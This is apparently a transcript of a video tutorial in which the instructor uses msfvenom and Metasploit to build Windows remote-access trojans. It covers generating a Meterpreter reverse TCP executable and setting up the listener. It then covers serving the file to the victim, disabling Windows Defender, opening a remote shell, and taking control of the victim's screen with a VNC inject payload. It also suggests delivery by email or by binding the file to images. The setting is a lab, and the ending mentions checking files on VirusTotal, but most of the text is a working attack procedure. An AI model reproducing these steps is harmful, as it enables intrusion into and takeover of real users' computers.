Now let's utilize our Kali Linux and create the first malware using the pre-installed Metasploit framework. To utilize the MSF, you just have to start with MSF, and if you press tab button, you will see that MSF has multiple different options available for you. All you have to use is the MSF console and MSF Venom right now. So I'm gonna use only these two right now, and in upcoming session we will use the few others as well. So let's just go with sudo MSF console and hit enter. Go with your password to start the MSF console. Now the MSF console here is used to handle the incoming connections, send different payloads, execute different scripts on the victim device. And all those scripts are categorized under 7 different categories here. The first one is exploits. So for exploits, these are the scripts which you can utilize to directly exploit the vulnerability on the victim. Now we have different auxiliary scripts. You can use these scripts to extract more information, collect more information about the target system. After auxiliaries, we have post scripts which you will use to perform later actions. After getting the initial access over the system, you use these post scripts to escalate your privileges, to migrate from one system to another system. So for this kind of operation, this kind of actions, you use these post scripts. After post, we have payloads. So payloads are the scripts which you will use to take advantage of a particular weakness. And in this case, we have different payload scripts to create the output to perform malicious actions on the victim device. You can use these same payloads to create your malwares as well. And we have different encoders to encode those malwares, different outputs, different scripts, different malicious action commands into different formats. And for the encoding, we have different encoders here. Now if you want to bypass a specific function for different tasks, let's say we have a function in particular the client application for, let's say, a software for Windows device, which will not allow the application to accept the hexadecimal code, right, which only accept the ASCII character set. If we enter any hex code in the input, it will not be allowed by the application. So if you want to bypass this kind of function which blocks the input, which implements some filters, you can use this no operation, NOPs in short. Then we have different evasion scripts which you can use to evade the firewalls, to evade the antivirus as well. Now if you want to create the malware, let's start with the simple command, but for that you have to use the MSF Venom. As we've seen that MSF console is only used for the handling purpose, right? And to use the MSF Venom, let's open a new tab and start writing MSF Venom. So let's go with the help menu first, and here you can see we have different options which we can utilize to create our desired output. You can specify which particular payload you want to use. If you want, you can list all the payloads first and then select one of them to use them. Then you can specify the format, in what particular format you want. You want an executable exe file, you want a Python code, you want a Java code, you want the compiled C code, or what kind of format you want. You can use different encoders as well. If you want, you can encrypt it, and again there are multiple different options which we will be using in our upcoming session. But for a simple command, for a simple malware, let's go with simple command msf venom and go with minus minus list first, that we want to list all the payloads. If you want, you can go with single L as well, and I want to see all the payloads for, let's say, Windows. If you want, you can filter it out for Linux as well, for Mac OS as well, for Android as well. It's completely your call for which operating system you want to filter it or how you want to filter it. So if I list all of them for all the operating system, for all the application, for all the services, you will get the list here, which is again a whole list of different payloads available, and the list size is 1468. So you are getting a list of these many payloads here. Now we know our victim is Windows 11, so let's filter these results for Windows. So just go with MSF Venom and go with minus L go with payloads, then grep, and I'm going to filter it for Windows. Meterpreter is again an option availed by this Metasploit framework, in which we can utilize the pre-configured commands, pre-configured options, and we can also execute the Linux commands on Windows devices as well. So this kind of additional functionality is provided by the Metasploit framework, which is only available to Meterpreter. So Meterpreter is just again a connection handler which we will be using in our console here. So let's filter the results first. And here you can see we have the results in our screen, and out of these you can pick any one of them, and based on the payload you will get the result. For example, if I am using this Windows reverse TCP, for example, if I am using reverse HTTP proxy pstore, this particular payload will inject a payload and get a connection over the HTTP service. If I am using this IPv6 TCP, then the connection will be initiated over the IPv6 address instead of IPv4. Right? So these kind of options are already available or also available in your Windows device. Simple. But let's use a simple one. I'm going to use the last as reverse TCP. So let's use it in our MSF Venom. So in MSF Venom, just go with -p and Windows Meterpreter reverse TCP, and we just have to specify few variables here. If you are not familiar with the variables, you can go with the console simply and just go with use multi-handler. If you are not using any predefined exploit and you are using your custom payload or the payloads in the MSF Metasploit framework, then you have to use this multi-handler to accept or handle the connections. For that, just go with use multi-handler, and the payload configured is generic shell reverse TCP, but because we are using a different payload here, we have to specify the same in console as well. So let's go with set payload and then specify the payload name as Windows Interpreter reverse TCP. Payload is configured. Now if you go with the options here, options, you can see we have few variables which is required. Lhost is the listening address. It means we will be listening on this Linux machine and the connection will be initiated by this Windows machine. Because we are using the reverse connection here, we will be accepting the connection. If we are using the forward TCP or the forward connection or the bind connection, in case of binding or the forwarding part, we will initiate the connection from this Kali machine and Windows machine will accept or receive the connection request. Right? So in case of reverse, Windows will send a connection request to Kali Linux and we just have to handle it. Simple. So we just need to specify the local host, the listening address, the IP address for this listening one. Just go with the IP space A command to get your current IPv address, and the address is 192.168.119.128. Let's just configure it. Set lhost 192.168.119.128. Simple. If you again verify it with options, the IP address is configured for the lhost. If you want, you can change the listening port as well. It's your call. Otherwise, just go with the run command to start your connection handler, connection listener here. Now, just specify the same lhost here. We are just specifying this lhost variable just to guide the Windows machine where it has to send the connection request. So Windows machine will send the connection request on this particular IP. Windows will send a request to 192.168.119 and 128, which is associated with my Kali Linux machine. And I want a format of exe. If you want, you can list formats as well. And I'm using -o for the output as malware.exe. Pretty simple command. Now let's execute this and wait for a few seconds to get your output. We see that this is the file, and now all we have to do is just send this file to the victim device. It's your call how you want to transfer it. You can transfer it through emails, you can transfer it through storage devices as well. It's completely your call how you want to transfer it. So just for the simplicity, I'm going to start a simple Python server so I can list all the directories and all the files within my network. And I'm starting this server on port number 80. Now just for the demonstration, I'm going to this Windows machine and let's download the malware file. You can use other formats, other methods as well to transfer your file. If you want, you can just bind it with some image files as well. And there are different tools, or you can also use the MSF to bind the file. All you have to use is just different options available by MSF Venom. Now let's go to Windows 11 and let's download this malware.exe file. And here you can see the malware.exe isn't commonly downloaded. Make sure you trust malware.exe before you open it. We got this error because of the certificate. So if you just go with the other options, go with keep, and if I want to keep it, let's go with keep anyway, and let's download the file. And just after that we get an alert that the threat is found by Windows Defender. Because we get this error because the malware, the file that we have just downloaded, is an executable, and the executable file in Windows is trusted, is verified by the certificates, by the signature. For example, this is the VLC. Let me just go with the large icons. This is the VLC executable or VLC installer. This is the Brave browser installation or the FDM installation. For example, if I want to go with the details of this VLC, that this is a trusted file or not, you can go with the properties, and inside the properties you will see this digital signature. And in the previous session we have seen that these signatures are usually known for their identity, for their integrity part as well. So if I just go with this details options and view certificates, certificate path, here you can see the certificate is trusted by DigiCert, right? And in all the operating system including this Windows as well, if we search here for certificate, manage user certificate or manage computer certificates, go with yes, you can verify different certificates here. So if I go with this trusted root certificates, certificate itself, and if I search for DigiCert, you can see DigiCert certificates are already trusted by our Windows device, and based on these trust, our applications are classified as secure or insecure at the initial level. Antivirus works in a parallel, but initial check is performed on these certificates as well. So just to avoid this removal of the file and threat detection case by the defender, I'm just going to disable it for a second, so we can just download the file and execute it for once, just to analyze how malwares actually behave or actually work. So let's just dismiss it, go to virus and threat protection, go to settings, and just disable this real-time protection for once. You don't actually need a third-party antivirus software. If you want to use the Windows for a personal, just use the Windows Defender, which is pre-installed in all of your devices. Just keep it updated and your device is good to go. So let's minimize this and let's download the file again. For that, let's go to malware. I know it's not trusted, keep it. Let's go to keep anyway, and the file is downloaded. Now if I open the folder, you can see this malware.exe file is there, and if I go to properties, the file is not signed. Now attackers can also use the trusted signatures to bypass these antivirus detection, because most of the antivirus verify the file by their signatures as well, and if the file is signed by a valid certificate, it will automatically skip rest of the scans. If the file is signed by Microsoft, for example, the rest of the scans for their behavior based, for their signature, for their other internal files will be skipped because of the certificate, right? So attackers also use this kind of signed certificates, signed malwares to get them executed on the victim device. Now if you check the Kali machine, we can see we got this connection request on our Python server. But if I go to MSF console, we are still listening on this IP and on this port. And if I execute this one, we will get the same error because of the certificate again. Let's just run it anyway. We can see publisher is unknown and this error is because of the certificate itself. Let's just run it anyway. And if we go back to this Kali machine, we can see a connection is open between these two devices. 128 is our Kali Linux machine and this 129 is our Windows machine. Now, if you go with the commands like ls, you will be able to list all the files on their system and you can execute any command on their system. Simple. If you go with commands like id or go with whoami kind of command, they are not available for the Windows. And to get a list of all the commands which you can execute on your target, you can go with the help option here. You can get this command. For example, if I want to get this system, you just go with get system command and you will get a simple result, right? So you can get these kind of command, you can use them, you can play with these command, play with the simple malwares, but I would suggest always play with malwares inside your virtual machine. Don't play them in your main host machine. And after this simple CLI connection, if you want to go with the GUI connection as well with this simple MSF payloads, all you have to do is just change the payload to VNC. That's all you have to do is. So let's just filter them first. I'm gonna filter them for VNC, Windows VNC inject. All we are looking for is, so let's go to this VNC inject and reverse TCP simple connection. TCP RC4, no, a simple reverse TCP. Let's just use the same command. So instead of Meterpreter, we will be using VNC underscore or inject. Just remove the underscore and use the same VNC inject underscore reverse underscore TCP. Let's execute it. File is created. Now let's send it to the victim again. For that, let's just refresh this page. Let's download this malware.exe file again. I know it's malware, let's just keep it for now. File is present, the file is round bracket 1 and then open it and let's execute it. But before executing it, let's just start the listener first. So we have to change the payload, because if we go with the options here, you can see the payload uses Windows Meterpreter reverse TCP. So first of all, let's change the payload. Set payload as Windows, which is VNC inject and then reverse TCP. Now after this, go with the options and you can see the L host is already configured, which we entered previously, and the VNC host is our local loopback IP, VNC port is 5900. Pretty simple. Now just go with the run command to start the connection listener. Now when the listener is ready, if your victim executes the malware or triggers the malware, you will get the results on your Kali Linux machine. And it says session to created in the background, and pretty soon you will get the GUI of the victim device. So let's just wait for a few seconds, and here you can see the resolution might not be the same as of your device, but you can see their screen easily. If you want, you can set the resolutions as well. It's completely your call how you want to set them, but if you want, you can control their screen as well. All you have to do is just set the options to false. So if I go with this one or this one here, let me just show you here. So go with MSF console on this screen. We need to go with the root maybe, but it's working fine. Now let's go with set and payload Windows, spelling mistakes, Windows and VNC inject, and then go with reverse underscore TCP. Now if you go with the options, my mistake, options, oops, go with set multi-handler first, use multi-handler. Now let's go with this VNC, and now let's list the options. And here you can see, if you want to control the victim screen, you can set this view only to false. By default, you will only see the screen, you will not be able to control it. But if you want to control it, you can just set this view only to false. And when you start the listener will help you to control the screen while you can see the screen as well in the parallel, right? So that's how you can create a simple malware with MSF Venom, and you can use it for the general purpose, but don't use it for the organization level, because if you want to verify that the file is malware or not, you can verify it on VirusTotal. So let's go with virustotal.com, and let's see how the VirusTotal react to the malware that we have just created. So let's open this file. I'm not a robot. Let's go with crosswalk, another one, and verify. We may have to choose the file again. Confirm upload, uploading 100, and let's wait for a few seconds. It will give us the results soon. It will hardly take a few seconds, and we can see out of 8 they said this file is a malware. Don't execute this file, and they will also give you some result that this is suspicious, Trojan is there, and few other things are also there, right? Now if we talk about the different categories available in the malware field, just exit this one. So Trojans are very popular in the malware category because of their parent, and they are known as for the rat. Rat are known as remote access Trojan. They provide you the whole control over the device, which we just created. They can give you the CLI part, they can give you the GUI, they can give you the files, they can help you in analyzing their process, monitoring their process, they can help you to connect with different devices in the network. You can perform anything, again, most of the work with these rats that are available in the market. Or if you want, you can create one of them with the simple MSF Venom, or you can handle the connection with MSF console as well, right? And the malware that we have just created, the stews, is also called as the Trojans. Simple. And out of 73 antivirus, 59 of them says that the file is not good to use, right? Just don't execute the file. Simple. So you can use this VirusTotal to verify your file that you download is trustworthy or not, is legitimate or not, right? Simple.